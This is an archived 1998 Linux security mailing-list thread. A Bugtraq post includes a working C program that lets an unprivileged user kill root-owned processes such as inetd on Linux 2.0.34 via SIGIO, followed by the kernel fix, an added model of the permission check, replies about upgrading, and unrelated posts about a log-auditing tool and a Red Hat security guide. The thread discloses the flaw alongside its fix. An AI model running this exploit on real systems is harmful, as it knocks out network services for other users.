---------- Forwarded message ----------
Date: Tue, 30 Jun 1998 15:10:47 +0800
From: David Luyer <luyer@UCS.UWA.EDU.AU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Serious Linux 2.0.34 security problem

I just saw this mentioned on linux-kernel and confirmed it;

#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  int s, p;
  if(argc != 2) {
    fputs("Please specify a pid to send signal to.\n", stderr);
    exit(0);
  } else {
    p = atoi(argv[1]);
  }
  fcntl(0,F_SETOWN,p);
  s = fcntl(0,F_GETFL,0);
  fcntl(0,F_SETFL,s|O_ASYNC);
  printf("Sending SIGIO - press enter.\n");
  getchar();
  fcntl(0,F_SETFL,s&~O_ASYNC);
  printf("SIGIO send attempted.\n");
  return 0;
}

This can kill from a normal user account the inetd process under Linux 2.0.34
by sending a SIGIO. Very bad.

The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
is approximately 139.

David.
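The effect of the one-character fix described above, as an added user-space model that is not part of the original post and is not the kernel's code. The struct, the function names, the sample credentials and the kill(2)-style id-matching rule are assumptions made for illustration; only the `!euid` versus `euid` guard comes from the message.

```c
#include <stdio.h>
#include <sys/types.h>

/* Hypothetical model of a task's credentials (not the kernel's struct). */
struct cred { uid_t uid, euid, suid; };

/* Constructed sample credentials. */
static const struct cred ROOT_DAEMON = { 0, 0, 0 };          /* e.g. inetd */
static const struct cred USER_A      = { 1000, 1000, 1000 };
static const struct cred USER_A_PROC = { 1000, 1000, 1000 };

/* Assumed rule: sender uid/euid must equal the target's uid or suid. */
static int ids_match(const struct cred *snd, const struct cred *tgt)
{
    return snd->euid == tgt->suid || snd->euid == tgt->uid ||
           snd->uid  == tgt->suid || snd->uid  == tgt->uid;
}

/* 2.0.34 as described: the reject test is guarded by !euid, so it can
 * only ever fire for root. Every non-root sender is let through. */
int sigio_allowed_buggy(const struct cred *snd, const struct cred *tgt)
{
    if (!snd->euid && !ids_match(snd, tgt))
        return 0;               /* signal not delivered */
    return 1;                   /* signal delivered */
}

/* With the guard inverted to euid: non-root senders are rejected unless
 * their ids match the target; root always passes. */
int sigio_allowed_fixed(const struct cred *snd, const struct cred *tgt)
{
    if (snd->euid && !ids_match(snd, tgt))
        return 0;
    return 1;
}

int main(void)
{
    printf("user -> root daemon: buggy=%d fixed=%d\n",
           sigio_allowed_buggy(&USER_A, &ROOT_DAEMON),
           sigio_allowed_fixed(&USER_A, &ROOT_DAEMON));
    printf("user -> own process: buggy=%d fixed=%d\n",
           sigio_allowed_buggy(&USER_A, &USER_A_PROC),
           sigio_allowed_fixed(&USER_A, &USER_A_PROC));
    printf("root -> user process: buggy=%d fixed=%d\n",
           sigio_allowed_buggy(&ROOT_DAEMON, &USER_A_PROC),
           sigio_allowed_fixed(&ROOT_DAEMON, &USER_A_PROC));
    return 0;
}
```

In this model the inverted guard also denies root when signalling other users' processes, which is the mirror image of the intended policy.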
Linux mailing list user
1998-Jul-05 03:00 UTC
[linux-security] Re: Serious Linux 2.0.34 security problem (fwd)
On Thu, 2 Jul 1998, Annex wrote:

> I just saw this mentioned on linux-kernel and confirmed it;
[...]
> The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
> is approximately 139.

A much simpler fix is to update to a 2.0.35preX kernel (X>=3).

ftp://ftp.uk.linux.org/pub/linux/alan/2.0.35pre/

LLaP
bero

---
Windows 98 supports real multitasking - it can boot and crash simultaneously.
*** Anyone sending unwanted advertising e-mail to this address will be
charged $25 for network traffic and computing time. By extracting my address
from this message or its header, you agree to these terms.
Jon Lewis
1998-Jul-05 20:40 UTC
[linux-security] Re: Serious Linux 2.0.34 security problem (fwd)
On Sun, 5 Jul 1998, Linux mailing list user wrote:

> > The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
> > is approximately 139.
>
> A much simpler fix is to update to a 2.0.35preX kernel (X>=3).

Actually, this is such a trivial bug to fix, that for many it probably makes
more sense to edit fs/fcntl.c and recompile rather than subject themselves to
the latest pre-release kernel...unless they like testing pre-releases.

Just out of curiosity...word of this broke in linux-kernel and bugtraq in the
last days of June. Were the linux-security moderators away on holiday, or do
they live in a time zone several days behind the rest of the world?

[mod: Moderators have other stuff to do besides keeping an eye on
linux-security. I've actually been pretty busy lately: I currently have
three clients shouting that they want stuff done NOW. Anyway, I still try
to find the time to moderate linux-security once a day.

But this doesn't have anything to do with what you mention: I don't go and
find stuff on Linux-kernel and forward it here. I let someone else do that.
So if you see something on another mailing list, and think it's relevant,
go ahead and forward it.

Regards,
Roger Wolff
Your Moderator. ]

------------------------------------------------------------------
 Jon Lewis <jlewis@fdt.net>  |  Spammers will be winnuked or
 Network Administrator       |  drawn and quartered...whichever
 Florida Digital Turnpike    |  is more convenient.
______http://inorganic5.fdt.net/~jlewis/pgp for PGP public key____
<seifried@seifried.org>
1998-Jul-07 23:27 UTC
ANNOUNCE: WinAudlog, centralized logfile checking - forward from , bugtraq
>From owner-bugtraq@NETSPACE.ORG Tue Jul 7 16:23:51 1998

-----BEGIN PGP SIGNED MESSAGE-----

DO YOU TRUST YOUR SYSTEM'S LOGS?

AudLog For Windows
Secure System Log Auditing
** FREE **

AUDLOG for Windows can be used to centralize the auditing of distributed
system logs in a network and certify that intruders did not modify these
logs. When combined with SECURE SYSLOG, AudLog for Windows makes the perfect
package for SECURE LOGGING and AUDITING:

+ Easy to use graphical interface
+ AUDLOG downloads the logs generated by SECURE SYSLOG and verifies its
  integrity
+ Allows for centralized auditing of an unlimited number of computers in a
  network
+ PEO-1 cryptographic protocol for authenticating log-files integrity
+ 128-bits symmetric cryptography and a challenge-response protocol for
  mutual authentication and confidentiality.
+ Iconized Security flags for log-files, hosts and groups of hosts.

SECURE SYSLOG (ssyslog) is available for UNIX systems. Designed to replace
the syslog daemon, ssyslog implements a cryptographic protocol called PEO-1
that allows the remote auditing of system logs. Auditing remains possible
even if an intruder gains superuser privileges in the system, the protocol
guarantees that the information logged before and during the intrusion
process cannot be modified without the auditor (on a remote, trusted host)
noticing.

What is AudLog for Windows?
~~~~~~~~~~~~~~~~~~~~~~~~~~

Audlog is a Win95/WinNT program that lets you manipulate logfiles from a
centralized point in your network. It works in conjunction with Secure
Syslog, a replacement for the UNIX syslogd that provides cryptographic
mechanisms to verify the integrity of the log files. Secure Syslog provides
a way of auditing the log files remotely, from a trusted auditing host using
the provided UNIX utility called 'audlog'. WinAudlog is the equivalent
program for MS Windows, it features an easy to use interface, the required
crypto algorithms for authentication, data transfer and integrity checking.

AUDLOG was developed in CORELABS, the research labs of CORE SDI S.A., and is
now being distributed freely.

AUDLOG and SECURE SYSLOG are FREE.

To get the binary for Windows 95/NT go to:
- -------------------------------------------
<http://www.core-sdi.com/audlog>

To get the source code and/or more information regarding ssyslog go to:
- -----------------------------------------------------------------------
<http://www.core-sdi.com/ssyslog>

To get more information about CORELABS, SECURE LOGGING or PEO go to:
- --------------------------------------------------------------------
<http://www.core-sdi.com/ENGLISH/CoreLabs>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAwUBNaKG8vnO/LnPTgz1AQEt1AP+LBAKZlvNcPxBlTkYm3RxGzW/zPFAlHdg
bMlPfgT5gU17C+xuBsfkrNJ/cQ92QDaUmFu7YM1/g3fgg9I8qzHEUv55asxdD86F
JTUzhKSM1E3/iu2ZbksX6kAFwUyG05csw8xCm1sz9Rlauu4wnjmVHvyQ4erZha3Z
CKX+PKfxVOc=Bpl9
-----END PGP SIGNATURE-----

--
==============================[ CORE Seguridad de la Informacion S.A. ]======
Ivan Arce
Technology Management           Email     : ivan@core-sdi.com
Av. Santa Fe 2861 5to C         TE        : +54-1-821-1030
CP 1425                         FAX       : +54-1-821-1030
Buenos Aires, Argentina         Messaging : +54-1-317-4157
=============================================================================

---end of message

-seifried
I was looking around for a book specifically on Linux security a week or two
ago, and couldn't find any. I wanted something Linux specific as opposed to
say O'Reilly's yellow safe book. Couldn't find any (not even at our local
computer book store which has 50+ linux titles). So I looked through RedHat's
site, the manuals that came with 4.1, 5.0, and 5.1, nothing there. How odd I
thought. So I started writing one, it is pretty RedHat specific (as the
subject of this email would imply). I would like to get some feedback before
I continue, a.k.a. is it worthwhile/useful?

http://www.seifried.org/redhat-security/

and in case the dns fall down go boom because we're moving them to a newer,
faster network connection (and the internic seems to be responding somewhat
slowly):

http://24.108.11.200/redhat-security/

Please don't flame me over details/etc, if you spot an error tell me and I
will fix it (I have been pretty careful though, it is supposed to be a book
on security =).

-seifried